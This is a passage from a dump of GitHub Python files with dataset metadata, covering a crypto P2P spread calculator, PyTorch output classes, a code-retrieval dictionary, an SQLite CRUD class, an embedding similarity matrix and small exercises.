= get_p2p_price('BTC', 'BUY', summa)\np2pBUSDbuy = get_p2p_price('BUSD', 'BUY', summa)\np2pBNBbuy = get_p2p_price('BNB', 'BUY', summa)\np2pETHbuy = get_p2p_price('ETH', 'BUY', summa)\np2pRUBbuy = get_p2p_price('RUB', 'BUY', summa)\n# p2pSHIBbuy = get_p2p_price('SHIB', 'BUY', summa)\n\np2pUSDTsell = 
get_p2p_price('USDT', 'SELL', summa)\np2pBTCsell = get_p2p_price('BTC', 'SELL', summa)\np2pBUSDsell = get_p2p_price('BUSD', 'SELL', summa)\np2pBNBsell = get_p2p_price('BNB', 'SELL', summa)\np2pETHsell = get_p2p_price('ETH', 'SELL', summa)\np2pRUBsell = get_p2p_price('RUB', 'SELL', summa)\n# p2pSHIBsell = get_p2p_price('SHIB', 'SELL', summa)\n\nspotUSDT = get_coin_price('USDT', 'RUB')\nspotBTC = get_coin_price('BTC', 'RUB')\nspotBUSD = get_coin_price('BUSD', 'RUB')\nspotBNB = get_coin_price('BNB', 'RUB')\nspotETH = get_coin_price('ETH', 'RUB')\n# spotSHIB = get_coin_price('SHIB', 'rub')\n\nth = ['COIN', '% input', 'p2p BUY', 'spot cost', 'p2p SELL', '% output']\ntd = [\n 'USDT', (spotUSDT - p2pUSDTbuy) / p2pUSDTbuy * 100, p2pUSDTbuy, spotUSDT, p2pUSDTsell,\n (p2pUSDTsell - spotUSDT) / spotUSDT * 100,\n 'BTC', (spotBTC - p2pBTCbuy) / p2pBTCbuy * 100, p2pBTCbuy, spotBTC, p2pBTCsell,\n (p2pBTCsell - spotBTC) / spotBTC * 100,\n 'BUSD', (spotBUSD - p2pBUSDbuy) / p2pBUSDbuy * 100, p2pBUSDbuy, spotBUSD, p2pBUSDsell,\n (p2pBUSDsell - spotBUSD) / spotBUSD * 100,\n 'BNB', (spotBNB - p2pBNBbuy) / p2pBNBbuy * 100, p2pBNBbuy, spotBNB, p2pBNBsell,\n (p2pBNBsell - spotBNB) / spotBNB * 100,\n 'ETH', (spotETH - p2pETHbuy) / p2pETHbuy * 100, p2pETHbuy, spotETH, p2pETHsell,\n (p2pETHsell - spotETH) / spotETH * 100\n]\n\ncolumns = len(th)\n\ntable = PrettyTable(th)\n\ntd_data = td[:]\n\nwhile td_data:\n table.add_row(td_data[:columns])\n td_data = td_data[columns:]\n\nprint(table) # Печатаем таблицу\n\nend = time.time()\n\nprint(\"The time of execution of above program is :\",\n (end - start) * 10 ** 3 / 1000, \"sec\")\n\ncoins = ['usdt', 'btc', 'busd', 'bnb', 'eth']\ncoins_buy = {'usdt': p2pUSDTbuy, 'btc': p2pBTCbuy, 'busd': p2pBUSDbuy, 'bnb': p2pBNBbuy, 'eth': p2pETHbuy}\ncoins_sell = {'usdt': p2pUSDTsell, 'btc': p2pBTCsell, 'busd': p2pBUSDsell, 'bnb': p2pBNBsell, 'eth': p2pETHsell}\ncoins_persents = {'usdt': (spotUSDT - p2pUSDTbuy) / p2pUSDTbuy * 100, 'btc': (spotBTC - p2pBTCbuy) / p2pBTCbuy * 100,\n 'busd': (spotBUSD - p2pBUSDbuy) / p2pBUSDbuy * 100, 'bnb': (spotBNB - p2pBNBbuy) / p2pBNBbuy * 100,\n 'eth': (spotETH - p2pETHbuy) / p2pETHbuy * 100}\nfor i in coins:\n for j in coins:\n if j != i:\n st = 10000\n st /= coins_buy[i]\n st /= get_coin_price(i, j)\n st *= coins_sell[j]\n if 0 < (st - 10000) / 10000 < 10:\n print(i + '/' + j)\n print((st - 10000) / 10000 * 100)\n\nrubs_coins = ['ADA', 'ALGO', 'ARB', 'ARPA', 'BNB', 'BTC', 'BUSD', 'DOT', 'ETH', 'LTC', 'MATIC', 'NEAR', 'NEO', 'SOL',\n 'XRP']\nbest = max(coins_persents, key=coins_persents.get)\nprint(best)\nfor i in rubs_coins:\n try:\n st = 10000\n st /= coins_buy[best]\n st /= get_coin_price(i, best)\n st *= get_coin_price(i, 'rub')\n print(i)\n print((st - 10000) / 10000 * 100)\n except:\n pass\n", "repo_name": "dez1ros/find_p2p_spred_binance", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3557, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 10, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 12, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 13, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 14, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 15, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 16, "usage_type": "call"}, {"api_name": 
"coin_price.get_p2p_price", "line_number": 17, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 20, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 21, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 22, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 23, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 24, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 25, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 28, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 29, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 30, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 31, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 32, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 51, "usage_type": "call"}, {"api_name": "table.add_row", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 77, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 91, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "71191851367", "text": "import torch\n\n# output classes for bi-encoder and mm-encoder account for flexibility in case of additional byol or data2vec outputs\n\nclass DispatcherOutput:\n def __init__(\n self,\n student_input, \n teacher_inputs, \n align_fuse, \n apply_mask: bool, \n labels: torch.Tensor, \n output_modalities: dict, \n metric: str, \n num_classes: int,\n ) -> None:\n self.student_input = student_input\n self.teacher_inputs = teacher_inputs\n self.align_fuse = align_fuse\n self.apply_mask = apply_mask\n self.labels = labels\n self.output_modalities = output_modalities\n self.metric = metric\n self.num_classes = num_classes\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n\nclass ModelOutput:\n def __init__(\n self,\n pooler_output: torch.Tensor,\n last_hidden_state: torch.Tensor,\n hidden_states: torch.Tensor,\n attentions: torch.Tensor,\n cross_attentions: torch.Tensor \n ) -> None:\n self.pooler_output = pooler_output\n self.last_hidden_state = last_hidden_state\n self.hidden_states = hidden_states\n self.attentions = attentions\n self.cross_attentions = cross_attentions\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n \n \nclass CriterionOutput:\n def __init__(\n self,\n total_loss: torch.Tensor,\n latent_loss: torch.Tensor = None,\n align_loss: torch.Tensor = None,\n ) -> None:\n self.total_loss = total_loss\n self.latent_loss = latent_loss\n self.align_loss = align_loss\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n\nclass ForwardPassOutput:\n def __init__(\n self,\n student_output: ModelOutput = None,\n teacher_output: ModelOutput = None,\n align_fuse: dict = None,\n labels: torch.Tensor = None,\n output_modalities: dict = None,\n metric: str = None,\n num_classes: int = None,\n criterion_output: CriterionOutput = None,\n ) -> None:\n self.student_output = student_output\n self.teacher_output = teacher_output\n self.align_fuse = align_fuse\n 
self.labels = labels\n self.output_modalities = output_modalities\n self.metric = metric\n self.num_classes = num_classes,\n self.criterion_output = criterion_output\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n ", "repo_name": "marcomoldovan/multimodal-self-distillation", "sub_path": "src/models/components/outputs.py", "file_name": "outputs.py", "file_ext": "py", "file_size_in_byte": 2761, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.Tensor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "29647903572", "text": "word = 'podaj slowo lub zdanie:'\ndict1 = dict()\n\nfor sign in word:\n dict1[sign] = dict1.get(sign, 0) + 1\n\nfor znak, ilosc in dict1.items():\n print(f'{znak} -> {ilosc}')\n\n\nfrom collections import defaultdict\nzliczenia = defaultdict(int)\nfor znak in word:\n zliczenia[znak] += 1\nprint(\"333: \", zliczenia)", "repo_name": "marcinszymura/python_kurs", "sub_path": "day3/zadanie_get_slownik.py", "file_name": "zadanie_get_slownik.py", "file_ext": "py", "file_size_in_byte": 310, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "35013439440", "text": "import requests\n\n# Specify the URL of the PDF file in the repository\npdf_url = \"https://drive.google.com/file/d/1CLl2OruM9oPscyjaBhXiUD-dfdDNYDII/view?usp=sharing\"\n\n# Send a GET request to download the PDF file\nresponse = requests.get(pdf_url)\n\n# Check if the request was successful\nif response.status_code == 200:\n # Access the PDF content\n pdf_content = response.content\n # Your code to work with the PDF content goes here\n # For example, you can save it to a local file or process it further\nelse:\n print(\"Failed to retrieve the PDF file.\")\n", "repo_name": "harithabeduduru/mounika", "sub_path": "intern.py", "file_name": "intern.py", "file_ext": "py", "file_size_in_byte": 559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "40398157659", "text": "from typing import *\n\nimport torch\n\nfrom ncc.data import constants\nfrom ncc.data.dictionary import Dictionary\nfrom ncc.data.retrieval.word_bpe_dictionary import WordBpeDicionary\n\n\nclass HybridRetrievalDictionary(object):\n \"\"\"Hybrid retrieval dictionary, composed of subtoken and bpe dictionaries\"\"\"\n\n def __init__(self, subtoken_dict=None, bpetoken_dict=None):\n self.subtoken_dict = subtoken_dict\n self._subtoken_len = 0 if self.subtoken_dict is None else len(self.subtoken_dict)\n self.bpetoken_dict = 
bpetoken_dict\n self._bpetoken_len = 0 if self.bpetoken_dict is None else len(self.bpetoken_dict)\n\n def __len__(self):\n return self._subtoken_len + self._bpetoken_len\n\n def __getitem__(self, idx):\n if idx < self.__len__():\n if idx < self._subtoken_len:\n return self.subtoken_dict.symbols[idx]\n elif idx < self._subtoken_len + self._bpetoken_len:\n return self.bpetoken_dict.symbols[idx - self._bpetoken_len]\n return constants.UNK\n\n def __eq__(self, other):\n return (self.subtoken_dict is not None and self.subtoken_dict.indices == other.subtoken_dict.indices) and \\\n (self.bpetoken_dict is not None and self.bpetoken_dict.indices == other.bpetoken_dict.indices)\n\n def __contains__(self, sym):\n return (self.subtoken_dict is not None and sym in self.subtoken_dict.indices) and \\\n (self.bpetoken_dict is not None and sym in self.bpetoken_dict.indices)\n\n def unk(self):\n if self.subtoken_dict:\n return self.subtoken_dict.unk()\n else:\n return None\n\n @property\n def unk_word(self):\n if self.subtoken_dict:\n return self.subtoken_dict.unk_word\n else:\n return None\n\n def pad(self):\n if self.subtoken_dict:\n return self.subtoken_dict.pad()\n else:\n return None\n\n def eow(self):\n if self.bpetoken_dict:\n return self.bpetoken_dict.eow()\n else:\n return None\n\n def sow(self):\n if self.bpetoken_dict:\n return self.bpetoken_dict.sow()\n else:\n return None\n\n @classmethod\n def load(cls, f):\n subtoken_dict = Dictionary.load(f)\n splitted_filenames = f.rsplit('.', 2)\n bpe_f = '.'.join([splitted_filenames[0], 'bpe'] + splitted_filenames[-2:])\n bpetoken_dict = WordBpeDicionary.load(bpe_f)\n return cls(subtoken_dict, bpetoken_dict)\n\n def save(self, f):\n self.subtoken_dict.save(f)\n splitted_filenames = f.rsplit('.', 2)\n bpe_f = '.'.join([splitted_filenames[0], 'bpe'] + splitted_filenames[-2:])\n self.bpetoken_dict.save(bpe_f)\n\n def index(self, word):\n if word in self.subtoken_dict:\n subtokens = [word]\n else:\n subtokens = self.bpe_tokenize(word)\n subtoken_ids = []\n for token in subtokens:\n if token in self.subtoken_dict:\n subtoken_ids.append(self.subtoken_dict.index(token))\n elif token in self.bpetoken_dict:\n subtoken_ids.append(self.bpetoken_dict.index(token) + self._subtoken_len)\n else:\n subtoken_ids.append(self.subtoken_dict.unk())\n return subtoken_ids\n\n def encode_line(\n self,\n line,\n line_tokenizer,\n func_name,\n **kwargs\n ):\n words = line_tokenizer(line, func_name=func_name, min_func_len=kwargs.get('min_func_len', None)) \\\n if line_tokenizer is not None else line\n ids = []\n for i, word in enumerate(words):\n idx = self.index(word)\n ids.extend(idx)\n ids = torch.Tensor(ids).long()\n return ids\n\n def bpe_tokenize(self, word: str) -> List[str]:\n \"\"\" Tokenizes inside an unknown token using BPE \"\"\"\n end_idx = min([len(word), self.bpetoken_dict.ngram_max])\n sw_tokens = [self.bpetoken_dict.sow_word]\n start_idx = 0\n\n while start_idx < len(word):\n subword = word[start_idx:end_idx]\n if subword in self.bpetoken_dict:\n sw_tokens.append(subword)\n start_idx = end_idx\n end_idx = min([len(word), start_idx + self.bpetoken_dict.ngram_max])\n elif len(subword) == 1:\n sw_tokens.append(self.bpetoken_dict.unk_word)\n start_idx = end_idx\n end_idx = min([len(word), start_idx + self.bpetoken_dict.ngram_max])\n else:\n end_idx -= 1\n\n sw_tokens.append(self.bpetoken_dict.eow_word)\n return sw_tokens\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc/data/retrieval/hybrid/hybrid_retrieval_dictionary.py", "file_name": 
"hybrid_retrieval_dictionary.py", "file_ext": "py", "file_size_in_byte": 4658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ncc.data.constants.UNK", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ncc.data.constants", "line_number": 28, "usage_type": "name"}, {"api_name": "ncc.data.dictionary.Dictionary.load", "line_number": 71, "usage_type": "call"}, {"api_name": "ncc.data.dictionary.Dictionary", "line_number": 71, "usage_type": "name"}, {"api_name": "ncc.data.retrieval.word_bpe_dictionary.WordBpeDicionary.load", "line_number": 74, "usage_type": "call"}, {"api_name": "ncc.data.retrieval.word_bpe_dictionary.WordBpeDicionary", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "252430878", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day 08 2017\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nwith open('input.txt', 'r') as f:\n data = f.read().splitlines()\n\nfrom collections import defaultdict as dd\nimport operator as o\n\nregs = dd(int)\n\noperators = {\n \">\": o.gt,\n \"<\": o.lt,\n \"==\": o.eq,\n \">=\": o.ge,\n \"<=\": o.le,\n \"!=\": o.ne\n}\n\nmaxes = []\n\ndef parseInst(instruction):\n oper, condition = instruction.split(' if ')\n target, operator, t_val = condition.split()\n reg, cmd, val = oper.split()\n return (reg, cmd, int(val),target, operator, int(t_val))\n\ndef command(reg, cmd, val):\n if cmd == \"inc\":\n regs[reg] += val\n else:\n regs[reg] -= val\n maxes.append(regs[reg])\n\nfor inst in data:\n reg, cmd, val, target, op, t_val = parseInst(inst)\n if operators[op](regs[target], t_val):\n command(reg, cmd, val)\n\nprint(max(regs.values()))\nprint(max(maxes))\n", "repo_name": "gmnr/advent-of-code", "sub_path": "2017/08/day08.py", "file_name": "day08.py", "file_ext": "py", "file_size_in_byte": 952, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 18, "usage_type": "call"}, {"api_name": "operator.gt", "line_number": 21, "usage_type": "attribute"}, {"api_name": "operator.lt", "line_number": 22, "usage_type": "attribute"}, {"api_name": "operator.eq", "line_number": 23, "usage_type": "attribute"}, {"api_name": "operator.ge", "line_number": 24, "usage_type": "attribute"}, {"api_name": "operator.le", "line_number": 25, "usage_type": "attribute"}, {"api_name": "operator.ne", "line_number": 26, "usage_type": "attribute"}]} +{"seq_id": "14711535962", "text": "import os\n\nimport dotenv\n\ndotenv.load_dotenv()\n\n\nclass Config:\n def __init__(self) -> None:\n self.debug_mode = False\n self.openai_api_key = os.getenv(\"OPENAI_API_KEY\", \"\")\n self.node_red_server = os.getenv(\"NODE_RED_SERVER\", \"\")\n self.fast_llm_model = os.getenv(\"FAST_LLM_MODEL\", \"gpt-3.5-turbo\")\n self.smart_llm_model = os.getenv(\"SMART_LLM_MODEL\", \"gpt-4\")\n self.temperature = float(os.getenv(\"TEMPERATURE\", \"1\"))\n\n assert self.openai_api_key != \"\", \"OpenAI API key not found\"\n", "repo_name": "viact-ai/automate_chatgpt_nodered", "sub_path": "utils/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 5, "usage_type": "call"}, {"api_name": 
"os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "20366125819", "text": "\"\"\"\r\nImplementación de las operaciones CRUD (Create - Read - Update - Delete)\r\nCon SQLite3\r\n\"\"\"\r\n\r\nimport sqlite3 as dbapi\r\nfrom os.path import isfile\r\nfrom base_datos_objetos import Empleado, Categoria, Producto\r\n\r\nclass BaseDatos:\r\n \"\"\"\r\n Representa la conexión a la base de datos y define las operaciones CRUD (Create - Read - Update - Delete)\r\n para una entidad\r\n \"\"\"\r\n\r\n def __init__(self, path):\r\n self.conexion=None\r\n self.cur = None\r\n\r\n if not isfile(path):\r\n raise ValueError('El '+path+' no existe...')\r\n\r\n else:\r\n self.conexion=dbapi.connect(path)\r\n self.cur = self.conexion.cursor()\r\n\r\n def create(self, empleado):\r\n \"\"\"\r\n Da de alta un empleado en la base de datos\r\n \"\"\"\r\n sql = \"insert into empleados(id,nombre, cargo) values(?,?,?)\"\r\n t = empleado.getTupla()\r\n return self.__actualizar(sql, t)\r\n\r\n def delete(self, id):\r\n \"\"\"\r\n Borra un empleado por clave primaria\r\n \"\"\"\r\n sql = \"delete from empleados where id=?\"\r\n t = (id,) \r\n return self.__actualizar(sql, t)\r\n\r\n def update(self, empleado):\r\n \"\"\"\r\n Actualiza un empleado de la base de datos\r\n \"\"\"\r\n sql = \"update empleados set nombre=?, cargo=? where id=?\"\r\n t = empleado.getTupla2()\r\n return self.__actualizar(sql, t)\r\n\r\n def __actualizar(self, sql, t):\r\n \"\"\"\r\n Ejecuta una consulta de acción dentro de una trasacción\r\n \"\"\"\r\n try:\r\n self.cur.execute(sql, t)\r\n n = self.cur.rowcount\r\n self.conexion.commit()\r\n return n\r\n\r\n except Exception as e:\r\n self.conexion.rollback()\r\n raise e\r\n\r\n def read(self, id):\r\n \"\"\"\r\n Devuelve un empleado de la base de datos\r\n \"\"\"\r\n sql = \"select * from empleados where id=?\"\r\n self.cur.execute(sql, (id,))\r\n t = self.cur.fetchone()\r\n if not t:\r\n raise ValueError('El id '+str(id)+ ' no existe en la base de datos')\r\n else:\r\n return Empleado(*t)\r\n\r\n def selectEmpleados(self, cargo=None):\r\n \"\"\"\r\n Devuelve una colección de objetos empleado\r\n \"\"\"\r\n empleados = []\r\n sql = \"select id,nombre,cargo from empleados\"\r\n if not cargo: \r\n self.cur.execute(sql)\r\n else:\r\n sql += \" where cargo like ?\"\r\n self.cur.execute(sql, (\"%\"+cargo+\"%\",))\r\n\r\n for t in self.cur.fetchall():\r\n empleado = Empleado(*t)\r\n empleados.append(empleado)\r\n return empleados\r\n\r\n def query(self, sql):\r\n self.cur.execute(sql)\r\n cabs = \";\".join([t[0] for t in self.cur.description])\r\n print(cabs)\r\n for t in self.cur.fetchall():\r\n linea = \";\".join([str(col) for col in t]) \r\n print(linea)\r\n\r\n def __del__(self):\r\n if self.cur: self.cur.close()\r\n if self.conexion: self.conexion.close()\r\n\r\nif __name__ == '__main__':\r\n try:\r\n bd = BaseDatos(\"../bd/empresa3.db\")\r\n #bd.query(\"select * from pedidos\")\r\n empleados = bd.selectEmpleados('ventas')\r\n for e in empleados:\r\n print(e)\r\n\r\n empleado = bd.read(4)\r\n print(empleado)\r\n empleado.cargo = \"Gerente de ventas\"\r\n bd.update(empleado)\r\n\r\n emp = bd.read(4)\r\n print(emp)\r\n\r\n #empleado = Empleado(50, \"Sandra Gonzalez\", \"Directivo de ventas\")\r\n 
#bd.create(empleado)\r\n\r\n \"\"\"\r\n if bd.delete(1):\r\n print('Registro borrado')\r\n else:\r\n print('No se ha podido eliminar')\r\n \"\"\"\r\n\r\n except Exception as e:\r\n print(e)\r\n", "repo_name": "aldebarran22/curso_santander_1", "sub_path": "codigo_feb_1/conexion_basedatos.py", "file_name": "conexion_basedatos.py", "file_ext": "py", "file_size_in_byte": 3782, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "base_datos_objetos.Empleado", "line_number": 75, "usage_type": "call"}, {"api_name": "base_datos_objetos.Empleado", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "5457451761", "text": "from typing import Iterable, List, Tuple, NamedTuple, Union, Optional, Dict\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom . import Embeddings\n\n\nclass EmbeddingSimilarity(NamedTuple):\n rank: int\n word: str\n similarity: float\n vec: np.ndarray\n\n\nMostSimilarResult = List[EmbeddingSimilarity]\nWordOrVec = Union[str, np.ndarray]\n\n\nclass Matrix:\n \"\"\" Transforms a lookup-based Embeddings object into a classical embedding matrix by looking up a fixed vocabulary\n and storing the results. The matrix can then be used for distance measuring.\n \"\"\"\n\n def __init__(self, lookup_embeddings: Embeddings, vocab: Optional[Iterable[str]] = None,\n precomputed_word2ind: Optional[Dict[str, int]] = None, precomputed_matrix: Optional[np.ndarray] = None,\n verbose: bool = False) -> None:\n \"\"\" Initialize the Matrix object.\n\n :param lookup_embeddings: the embeddings object used for lookup\n :param vocab: an iterable containing the words that should be stored in the matrix\n :param precomputed_word2ind: a precomputed word2ind dict, e.g. from the fastText .vec file\n :param precomputed_matrix: a precomputed embedding matrix, e.g. 
from the fastText .vec file\n :param verbose: setting this to True will show a progress bar when first looking up embeddings as well as output\n means when computing distances\n \"\"\"\n self.verbose = verbose\n self.lookup_embeddings = lookup_embeddings\n\n if vocab is not None:\n self._init_from_vocab(lookup_embeddings, vocab=vocab)\n elif precomputed_word2ind is not None and precomputed_matrix is not None:\n self._init_from_word2ind_and_matrix(precomputed_word2ind, precomputed_matrix)\n else:\n raise ValueError('The Matrix needs to be initialized either with vocab or word2ind+matrix')\n\n def _init_from_vocab(self, lookup_embeddings, vocab):\n vocab = set(vocab)\n self.vocab_size = len(vocab)\n self.word2ind = {word: i for i, word in enumerate(vocab)}\n self.ind2word = {i: word for i, word in enumerate(vocab)}\n self.embedding_matrix = np.zeros((self.vocab_size, lookup_embeddings.size))\n self.is_norm = False\n\n items: Iterable[Tuple[str, int]] = self.word2ind.items()\n if self.verbose:\n items = tqdm(items, desc='Looking up embeddings')\n for word, ind in items:\n looked_up = lookup_embeddings.lookup(word)\n if np.count_nonzero(looked_up) > 0:\n self.embedding_matrix[ind] = looked_up\n else:\n # this shouldn't happen anymore\n raise RuntimeError(f'Embedding vector for {word} is all zeros')\n\n def _init_from_word2ind_and_matrix(self, word2ind, matrix):\n self.vocab_size = len(word2ind)\n self.word2ind = word2ind\n self.ind2word = {i: word for word, i in self.word2ind.items()}\n self.embedding_matrix = matrix\n self.is_norm = True\n\n def init_norms(self, force: bool = False) -> None:\n \"\"\" Initializes self.norms with pre-computed L2 normalized vectors for cosine distance computation.\n\n :param force: setting this to True will update the norms even if they were already computed\n :return: None\n \"\"\"\n if not self.is_norm or force:\n # noinspection PyAttributeOutsideInit\n self.embedding_matrix = self.embedding_matrix / np.sqrt((self.embedding_matrix ** 2).sum(-1))[\n ..., np.newaxis]\n self.is_norm = True\n\n def _most_similar_cosine_measurement(self, vec):\n self.init_norms()\n normalized_vec = vec / np.linalg.norm(vec)\n return np.dot(self.embedding_matrix, normalized_vec)\n\n def most_similar_cosine(self, word_or_vec: WordOrVec, n: int = 20) -> MostSimilarResult:\n \"\"\" Calculate the cosine distance of the input vector to all vectors in the embedding matrix and return the\n most similar ones.\n\n :param word_or_vec: the input word or vector\n :param n: the number of results to return, or None if all should be returned\n :return: a list of MostSimilarResult objects\n \"\"\"\n return self._generic_most_similar(word_or_vec, self._most_similar_cosine_measurement,\n higher_is_more_similar=True, n=n)\n\n def cosine_distance_rank(self, word_or_vec: WordOrVec, word):\n return self._generic_rank(word_or_vec, word, self._most_similar_cosine_measurement, higher_is_more_similar=True)\n\n def cosine_distance(self, vec: np.ndarray, word: str) -> float:\n \"\"\" Returns the cosine distance between an input word and vector.\n\n :param vec: the input vector\n :param word: the input word\n :return: a float between -1 and 1\n \"\"\"\n self.init_norms()\n normalized_vec = vec / np.linalg.norm(vec)\n return float(np.dot(self.embedding_matrix[self.word2ind[word]], normalized_vec))\n\n def most_similar_l2(self, word_or_vec: WordOrVec, n: int = 20) -> MostSimilarResult:\n \"\"\" Calculate the L2 norm distance of the input vector to all vectors in the embedding matrix and return the\n most similar 
ones.\n\n :param word_or_vec: the input word or vector\n :param n: the number of results to return, or None if all should be returned\n :return: a list of (word, distance) pairs, with lower distance meaning more similar\n \"\"\"\n\n def measurement(vec):\n distances = np.zeros(self.vocab_size)\n for i, emb in enumerate(self.embedding_matrix):\n distances[i] = np.linalg.norm(vec - emb)\n return distances\n\n return self._generic_most_similar(word_or_vec, measurement, higher_is_more_similar=False, n=n)\n\n def _lookup_if_needed(self, word_or_vec: WordOrVec) -> np.ndarray:\n if type(word_or_vec) == str:\n return self.lookup_embeddings.lookup(word_or_vec)\n else:\n return word_or_vec\n\n def _generic_most_similar(self, word_or_vec: WordOrVec, measurement, higher_is_more_similar, n: int = 20):\n self.init_norms()\n vec = self._lookup_if_needed(word_or_vec)\n distances = measurement(vec)\n assert len(distances) == len(self.embedding_matrix)\n if self.verbose:\n print('mean distance', np.mean(distances))\n\n distances_for_sorting = -distances if higher_is_more_similar else distances\n\n if n is None or n == len(self.embedding_matrix):\n sorted_most_similar_ind = np.argsort(distances_for_sorting)\n else:\n most_similar_ind = np.argpartition(distances_for_sorting, n)[:n]\n sorted_most_similar_ind = most_similar_ind[np.argsort(distances_for_sorting[most_similar_ind])]\n\n return [EmbeddingSimilarity(rank=rank,\n word=self.ind2word[ind],\n similarity=distances[ind],\n vec=self.embedding_matrix[ind])\n for rank, ind in enumerate(sorted_most_similar_ind, start=1)]\n\n def _generic_rank(self, word_or_vec: WordOrVec, word, measurement, higher_is_more_similar):\n self.init_norms()\n vec = self._lookup_if_needed(word_or_vec)\n distances = measurement(vec)\n distances = -distances if higher_is_more_similar else distances\n\n word_distance = distances[self.word2ind[word]]\n return np.count_nonzero(distances[distances < word_distance]) + 1\n", "repo_name": "maxfriedrich/deid-training-data", "sub_path": "deid/embeddings/matrix.py", "file_name": "matrix.py", "file_ext": "py", "file_size_in_byte": 7525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 13, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 17, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 55, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 60, 